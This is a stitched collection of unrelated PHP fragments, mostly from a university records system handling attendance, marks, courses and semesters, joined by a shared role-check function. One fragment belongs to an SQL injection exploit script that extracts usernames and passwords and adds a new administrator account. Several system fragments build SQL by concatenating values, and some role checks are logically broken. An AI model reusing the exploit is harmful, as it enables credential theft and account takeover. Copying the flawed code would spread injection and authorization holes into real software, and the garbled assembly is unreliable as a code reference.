public function importCSV($course_code, $course_dep, $filename) { if (!loggedIn() || privilege() == NULL || privilege() == 'admin') { return 0; } $file = fopen($filename, "r"); $count = 0; while (($data = fgetcsv($file, 10000, ",")) !== FALSE) { $count++; if ($count > 1) { $save = $this->newEntry($data[0], $course_code, $course_dep, $data[1], $data[2]); } } fclose($file); return 1; }
public function startNewSession() { if (!loggedIn() && (privilege() != 'dean' || privilege() != 'director' || privilege() != 'admin')) { return 0; } $this->_connect(); if (!Session::exists('semester_session')) { $type = 'odd'; $session = date('Y'); } else { if (Session::get('semester_type') === 'even') { $type = 'odd'; $session = Session::get('semester_session'); } else { if (Session::get('semester_type') === 'odd') { $type = 'even'; $session = Session::get('semester_session') + 1; } } } $timestamp = date('Y-m-d H:i:s'); $query = "INSERT INTO semester_session (session,type,starting_timestamp) VALUES('" . $session . "','" . $type . "','" . $timestamp . "')"; $result = $this->_db->query($query); if ($this->_db->affected_rows && $this->_db->error == '') { $this->getRunningSession(); return 1; } else { return 0; } }
/** * Admin has a priority of 0 * Director, Dean has a priority of 1 * HOD has a priority of 2 * DUPC/DPPC has a priority of 3 * Teacher has a priority of 4 * Student has a priority of 5 * @return integer * @author Harsh Vardhan Ladha & Yogesh Chauhan * @package MIS * @link http://mis.nits.ac.in * @license NIT Silchar */ function privilegePriority() { switch (privilege()) { case 'admin': return 0; case 'director': case 'dean': return 1; case 'hod': return 2; case 'dupc': case 'dppc': return 3; case 'teacher': return 4; case 'student': return 5; } }
<?php require_once '../core/init.php'; if (Input::exists() && privilege() != NULL && privilege() != 'admin') { $validate = new Validate(); $validation = $validate->check($_POST, array('course_id' => array('required' => true))); if ($validate->passed()) { if (empty($_FILES["file"]["tmp_name"])) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Please Select CSV File'; echo '</div>'; die; } $input = explode(',', Input::get('course_id')); $m = new Attendance(); $import = $m->importCSV($input[0], $input[1], $_FILES["file"]["tmp_name"]); if ($import) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo "Successfully Imported"; echo '</div>'; } else { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo "Temporary problem!"; echo '</div>'; } } else { echo '<div class="alert alert-warning alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
<?php require_once '../core/init.php'; if (Input::exists('post') && privilege() != NULL) { $validate = new Validate(); $validation = $validate->check($_POST, array('coursecode' => array('required' => true), 'department' => array('required' => true), 'teacher' => array('required' => true), 'semester' => array('required' => true))); if ($validate->passed()) { $course = new Course(); $add = $course->appointCourse(Input::get('teacher'), Input::get('coursecode'), Input::get('semester'), Input::get('department')); if ($add == 3) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Sorry, This teacher is not yet approved to use this system.'; echo '</div>'; } else { if ($add == 2) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Same course is already assigned to same teacher in this department.'; echo '</div>'; } else { if ($add == 1) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Course assigned to teacher successfully.'; echo '</div>'; } else { if ($add == 0) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Temporary Error!';
<?php require_once '../core/init.php'; if (!loggedIn() || privilege() == NULL || privilege() == 'admin') { die; } ?> <!-- DATA TABLES --> <link href="css/datatables/dataTables.bootstrap.css" rel="stylesheet" type="text/css" /> <?php $s = new Student(); $s->getInfo(Session::get('sn')); ?> <section class="content-header"> <h1> Attendance System <small>View attendance</small> </h1> <ol class="breadcrumb"> <li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">Attendance System</a></li> <li class="active">View attendance</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-1"> </div>
<?php require_once '../core/init.php'; if (Input::exists() && privilege() != NULL) { $validate = new Validate(); $validation = $validate->check($_POST, array('course_id' => array('required' => true), 'examtype' => array('required' => true), 'category' => array('required' => true))); if ($validate->passed()) { $m = new Marks(); $lastdate = $m->getLastDate(Input::get('examtype'))->fetch_object()->date; $today = date('Y-m-d'); if ($today >= $lastdate) { $date = date_create($lastdate); echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo "Last Date for " . strtoupper(Input::get('examtype')) . " was " . date_format($date, 'd-M-Y'); echo '</div>'; die; } if (empty($_FILES["file"]["tmp_name"])) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Please Select CSV File'; echo '</div>'; die; } $input = explode(',', Input::get('course_id')); $m = new Marks(); $import = $m->importCSV($input[0], $input[1], Input::get('examtype'), Input::get('category'), $_FILES["file"]["tmp_name"]); if ($import) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>';
<?php require_once '../core/init.php'; if (!loggedIn()) { die; } if (privilege() == NULL) { die; } ?> <div class="row" id="content_area"> <div class="col-xs-12"> <div class="box"> <div class="box-header"> <h3 class="box-title">List of all Teachers</h3> </div><!-- /.box-header --> <div class="box-body table-responsive"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th>Name</th> <th>Privilege</th> <th>Department</th> <th>Email</th> <th>Mobile</th> <th>Approved</th> <th>Blocked</th> <th> </th> </tr> </thead> <tbody>
public function updateBiography($scholar_no, $biography, $cv = '') { if (!loggedIn() || privilege() == NULL) { return 0; } $this->_connect(); $scholar_no = $this->_db->real_escape_string(escape($scholar_no)); $biography = $this->_db->real_escape_string($biography); if ($cv == '') { $query = "UPDATE students_info SET biography = '" . $biography . "' WHERE scholar_no='" . $scholar_no . "'"; } else { $cv = $this->_db->real_escape_string($cv); $query = "UPDATE students_info SET biography = '" . $biography . "', cv_link='" . $cv . "' WHERE scholar_no='" . $scholar_no . "'"; } $result = $this->_db->query($query); if ($this->_db->error == '') { if ($this->_db->affected_rows) { return 1; } else { return 2; } } else { return 0; } }
</ul> </li> <?php if (privilege() != 'admin') { ?> <li <?php echo Session::get('side-nav-active') === 'attendance' ? 'class=active' : ''; ?> > <a href="attendance.php"> <i class="fa fa-calendar"></i> <span>Attendance System</span> </a> </li> <?php } if (privilege() === 'admin' || privilege() === 'director' || privilege() === 'dean') { ?> <li <?php echo Session::get('side-nav-active') === 'settings' ? 'class=active' : ''; ?> > <a href="settings.php"> <i class="fa fa-wrench"></i> <span>System Settings</span> </a> </li> <?php } ?> </ul> </section> <!-- /.sidebar -->
<?php require_once 'core/init.php'; if (!loggedIn()) { Redirect::to('index.php'); } else { if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc') || privilege() === 'student') { include 'includes/errors/404.php'; die; } } ?> <link rel="icon" href="images/nits2.jpg"> <link rel="shortcut icon" href="images/nits2.jpg" /> <script type="text/javascript" src="js/jquery.min.js"></script> <link rel="stylesheet" type="text/css" href="css/result.css"> <script> function load_pie(type){ $("#pie").load('ajax/log_pie.php?type='+type); } </script> <div class="tableh">System Log</div> <div class="res"> <table> <tr> <td class="sel"> Select Log Type </td> <td> <select name="credit" class="box" OnChange="load_pie(this.value);"> <option value="" selected>Default</option>
<?php require_once '../core/init.php'; if (loggedIn() && privilege() != NULL) { if (Input::exists('get')) { $tid = Input::get('tid'); $cid = Input::get('cid'); $did = Input::get('did'); $a = new Approval(); $b = $a->approve($tid, $cid, $did); if ($b === 1) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo 'Result approved!'; echo '</div>'; } else { if ($b === 2) { echo '<div class="alert alert-warning alert-dismissible" role="alert">'; echo 'Already approved by you!'; echo '</div>'; } else { if ($b === 0) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo 'Temporary Error!'; echo '</div>'; } else { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo $b; echo '</div>'; } } }
public function remove_appointed_course($id, $course_code, $department, $semester) { if (!loggedIn()) { return 'Temporary Problem.'; } if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc' || privilege() == NULL)) { return 'Access Denied. No privilege.'; } $this->_connect(); $id = $this->_db->real_escape_string($id); $course_code = $this->_db->real_escape_string($course_code); $department = $this->_db->real_escape_string($department); $semester = $this->_db->real_escape_string($semester); $query = "DELETE FROM courses_appointed WHERE id='" . $id . "' AND course_code='" . $course_code . "' AND course_dep='" . $department . "' AND course_sem='" . $semester . "'AND timestamp>=' " . Session::get('semester_timestamp') . "'"; $result = $this->_db->query($query); if ($this->_db->affected_rows) { if ($this->_db->error == '') { return 'Entry has been Deleted'; } else { echo '1'; die($this->_db->error); } } else { return 'Temporary Problem.'; } }
public function deleteT($t_id = '', $privilege = 'teacher') { if (loggedIn() && ($privilege === 'director' && (privilege() === 'hod' || privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'dean' && (privilege() === 'hod' || privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'hod' && (privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'teacher') || $privilege === 'dppc' && privilege() === 'teacher' || $privilege === 'dupc' && privilege() === 'teacher')) { return 'No privilege'; } if (loggedIn() && $this->deleteTeacherError($t_id)) { return "Sorry, cannot remove this teacher because he/she already has<br/>(<i>in this running session</i>)<br/>" . ($this->_tce != 0 ? " <b>{$this->_tce}</b> courses appointed.<br/>" : "") . ($this->_tae != 0 ? " <b>{$this->_tae}</b> subject results not fully approved." : ""); } if (loggedIn()) { if (Session::exists('teacher_id')) { if (Session::get('teacher_id') == $t_id) { return 'Can\'t delete yourself.'; } } $this->_connect(); $this->_id = $this->_db->real_escape_string(escape($t_id)); $query = "DELETE FROM teachers WHERE teacher_id='" . $this->_id . "'"; $result = $this->_db->query($query); if ($this->_db->affected_rows) { if ($this->_db->error == '') { return 'Teacher removed.'; } else { die($this->_db->error); } } else { return 'Temporary Error'; } } if (!loggedIn()) { return 'Temporary error'; } }
<?php require_once '../core/init.php'; if (Input::exists('get') && Input::get('a') != '' && (privilege() == 'dean' || privilege() == 'director' || privilege() == 'admin')) { $ab = Input::get('a'); $s = new Semester(); if ($ab == 1) { $a = $s->startRegistration(); if ($a == 1) { echo '<div class="alert alert-success alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Registration process started.'; echo '</div>'; } else { if ($a == 2) { echo '<div class="alert alert-warning alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'No changes made.'; echo '</div>'; } else { if ($a == 0) { echo '<div class="alert alert-danger alert-dismissible" role="alert">'; echo '<button type="button" class="close" data-dismiss="alert"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>'; echo 'Invalid authentication. Please try again later or re-login.'; echo '</div>'; } } } } if ($ab == 2) { $a = $s->stopRegistration();
<?php require_once 'core/init.php'; include 'header.php'; if (!loggedIn()) { Redirect::to('index.php'); } if (loggedIn() && !Session::exists('teacher_id') || privilege() == NULL) { Session::destroy(); Redirect::to('includes/errors/unauthorized.php'); } ?> <div id="update"></div> <form id="import" method="post" action="import_excel.php"> <div class="box box-default"> <div class="box-header"> <h3 class="box-title">Import CSV/Excel file</h3> </div> <div class="box-body"> <div class="form-group"> <label for="course">Select course with respective department</label> <select name="course_id" class="form-control"> <option value="" >Select your Course</option> <?php $i = 0; $c = new Course(); $courses = $c->getAppointed(Session::get('teacher_id')); while (!empty($courses) && ($course = $courses->fetch_object())) { ?> <option value="<?php echo $course->course_code . ',' . $course->course_dep;
return false; } } if ($argv[5] == "normal") { $normal = inj3ct_sql($argv[1], $argv[2], $argv[3], $argv[4]); if (isset($normal[0])) { echo "[?] Password: {$normal['1']}\r\n"; echo "[?] Username: {$normal['0']}\r\n"; die; } else { echo "[?] Exploit Failed!\r\n"; die; } } if ($argv[5] == "privilege") { if (privilege($argv[1], $argv[2], $argv[3], $argv[4])) { echo "[?] Added New Administrator\r\n"; echo "[?] Username: {$argv['3']}\r\n"; echo "[?] Password: {$argv['4']}\r\n"; die; } else { echo "[?] Exploit Failed!\r\n"; die; } } function http_request($conn, $path, $post) { if (!preg_match('/\\w:[0-9]/i', $conn)) { usage(); } $addr = explode(':', $conn);
<?php require_once '../core/init.php'; if (privilege() == NULL || privilege() == 'teacher' || privilege() == 'hod' || privilege() == 'dupc' || privilege() == 'dppc') { die; } $sem = new Semester(); $new = $sem->startNewSession(); if ($new) { if (Session::exists('semester_session')) { ?> <table class="table"> <tr> <th>Session (year)</th> <td><?php echo Session::get('semester_session'); ?> </td> </tr> <tr> <th>Type</th> <td><?php echo strtoupper(Session::get('semester_type')); ?> </td> </tr> <tr> <th>Starting Date</th> <td> <?php $date = Session::get('semester_timestamp');
<?php if (!loggedIn() || privilege() == NULL) { Redirect::to('logout.php'); } $s = new Student(); $s->getInfo(Session::get('sn')); ?> <section class="content-header"> <h1> Public Profile <small>Your Public Profile</small> <b><small>http://nits.ac.in/s/<?php $username = explode('@', $s->getEmail())[0]; echo "{$username}"; ?> </small></b> </h1> <ol class="breadcrumb"> <li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active"><a href="#">Public Profile</a></li> </ol> </section> <!-- Main content --> <section class="content"> <div class="row" id="preview"> </div> <div class="row"> <div class="col-md-12">
<?php require_once '../core/init.php'; if (Input::exists('get') || !Input::exists() || privilege() == NULL) { die; } $type = Input::get('examtype'); $t = new Teacher(); $tt = $t->getInfo(Session::get('teacher_id')); if (!Input::get('course_id')) { ?> <div class="box box-primary"> <div class="box-header"> <h3 class="box-title">Please Select Course</h3> </div> <!-- ./box header --> </div> <?php die; } if (!Input::get('examtype')) { ?> <div class="box box-primary"> <div class="box-header"> <h3 class="box-title">Please Select Exam Type</h3> </div> <!-- ./box header --> </div> <?php die; }
public function deleteDep($dept_id = '') { if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc')) { return 'No privilege.'; } if (loggedIn() && $this->deleteDepError($dept_id)) { return "Sorry, cannot remove this department because it already has<br/>" . ($this->_dce != 0 ? " <b>{$this->_dce}</b> courses.<br/>" : "") . ($this->_dte != 0 ? " <b>{$this->_dte}</b> teachers." : ""); } else { if (loggedIn()) { $this->_connect(); $this->_dept_id = $this->_db->real_escape_string(escape($dept_id)); $query = "DELETE FROM department WHERE dept_id='" . $this->_dept_id . "'"; $result = $this->_db->query($query); if ($this->_db->affected_rows) { if ($this->_db->error == '') { return 'Department has been Deleted'; } else { die($this->_db->error); } } else { return 'Temporary Problem.'; } } else { if (!loggedIn()) { return 'Temporary Problem'; } } } }
public function setLastDate($type, $lastdate) { if (loggedIn() && (privilege() == 'admin' || privilege() == 'director' || privilege() == 'dean')) { $this->_connect(); $type = $this->_db->real_escape_string(escape($type)); $lastdate = $this->_db->real_escape_string(escape($lastdate)); $query = "UPDATE last_dates SET date = '" . $lastdate . "' WHERE exam_type='" . $type . "'"; $result = $this->_db->query($query); if ($this->_db->affected_rows) { if ($this->_db->error == '') { return 1; } else { die($this->_db->error); } } else { return 4; } } else { if (loggedIn()) { return 3; } else { if (!loggedIn()) { return 0; } } } }
<?php require_once 'core/init.php'; if (!loggedIn()) { Redirect::to('logout.php'); } else { if (loggedIn() && (privilege() === 'teacher' || privilege() === 'dppc' || privilege() === 'dupc' || privilege() == NULL)) { Session::destroy(); Redirect::to('includes/errors/unauthorized.php'); } } ?> <section class="content-header"> <h1> Departments <small>Create new department</small> </h1> <ol class="breadcrumb"> <li><a href="home.php"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">Departments</a></li> <li class="active">Create new department</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="col-md-6"> <div id="update"> </div> <div class="box box-default">
<?php require_once 'core/init.php'; if (!loggedIn() || privilege() == NULL) { Redirect::to('logout.php'); } if (privilege() == 'admin') { Redirect::to('settings.php'); } include 'header.php'; Session::put('side-nav-active', 'home'); Session::put('side-nav-active-sub', ''); include 'sidebar.php'; Session::delete('side-nav-active'); Session::delete('side-nav-active-sub'); include 'welcome.php'; include 'footer.php';
<?php include_layout_template('admin_header.php'); ?> <!-- //header --> <br> <br> <!-- Content --> <div class="row-fluid"> <div class="span3"> <div class="bs-docs-sidebar create" style="padding-left:2px; padding-righ:2px;" > <h2 style="text-align:center">Notice</h2> <hr> <p>Welcome to the admin panel of the application form. You are currently signed in with <?php echo privilege(); ?> privileges <?php if (isset($dept)) { echo "for <strong>" . $dept . "</strong>"; } ?> . Actions done on this end are strictly confidential and are being logged.</p> <p>Other information can be put here</p> </div> </div> <div class="span9"> <h2>Control Panel <i class="iconic-cog"></i></h2> <hr>
<td> <?php echo $key->reject_msg; ?> </td> </tr> <?php } } ?> </table> </div><!-- ./box body --> </div> </div> <?php if (privilege() === 'dupc' || privilege() === 'dppc' || privilege() === 'hod' || privilege() === 'dean' || privilege() === 'director') { ?> <div class="col-md-3"> <div class="box box-warning"> <form id="view_result" role="form"> <div class="box-header"> <h3 class="box-title">Approve pending courses</h3> </div><!-- ./box-header --> <div class="box-body"> <div class="form-group"> <label for="course">Select course</label> <select class="form-control" id="course" name="course_id"> <option value="" >Select Course</option> <?php $a = new Approval();